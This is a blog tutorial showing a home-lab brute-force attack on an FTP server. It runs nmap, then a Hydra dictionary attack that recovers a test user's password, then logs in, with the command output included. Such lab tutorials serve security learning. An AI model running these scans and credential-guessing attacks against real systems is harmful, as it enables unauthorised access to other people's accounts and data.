In this article we will investigate other functionalities of the Cyber Security test tool Hydra. In one of the previous articles we cracked a user password on a Linux system through SSH. In this example we do not know the exact username of any FTP user. We will create a list of possible usernames along our password list. All of these operations happen in a personal lab.
Important note: hacking in the wild is illegal! Do NOT do it out of the lab, unless you are a penetration tester with a signed contract!
The hacker’s machine: Kali Linux [192.168.23.131]
The attacked machine: Debian Bullseye [192.168.23.133]
The two machines can see each other on the network.
The attacked machine runs an FTP server with password authentication.
Step 1: let’s see if the FTP server is listening
We use nmap to check the open ports on the remote server.
┌──(kali㉿kali)-[~]
└─$ nmap 192.168.23.133
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-23 14:50 CET
Nmap scan report for 192.168.23.133
Host is up (0.00075s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 0.05 secondsWe can see that the FTP service is running on the port 21.
Step 2: we use the power of Hydra to find a user and the password
Hydra can use user and password lists from files. In this practice we use this function to provide two files to the tool. Hydra will go through every possible permutations of the two dictionary files. If there is a valid combination, we can find the password and user name for an FTP user.
┌──(kali㉿kali)-[~]
└─$ hydra -L top-users.txt -P top-auth-mistakes.txt 192.168.23.133 ftp
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-23 14:52:23
[DATA] max 16 tasks per 1 server, overall 16 tasks, 786 login tries (l:6/p:131), ~50 tries per task
[DATA] attacking ftp://192.168.23.133:21/
[21][ftp] host: 192.168.23.133 login: ftpuser password: secret123
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-23 14:52:48Hydra found a user with a valid password!
Step 3: log in to the FTP server
Now we can log in to the FTP server for further operations.
┌──(kali㉿kali)-[~]
└─$ ftp ftpuser@192.168.23.133
Connected to 192.168.23.133.
220 ProFTPD Server (Toms IT Cafe Vulnerable FTP) [::ffff:192.168.23.133]
331 Password required for ftpuser
Password:
230 User ftpuser logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
Final thoughts
For this presentation I used an insecurely configured ProFTPd server with general Linux users.
Please do NOT try this in the wild, on the internet. Hacking is illegal. If you want to play with this, do it in your own separate lab environment.
If you have anything to share then please visit my Tom’s IT Cafe Discord Server!
Tom's IT Cafe 
One thought on “How to brute force FTP users and passwords with Hydra? Ethical Hacking in real life!”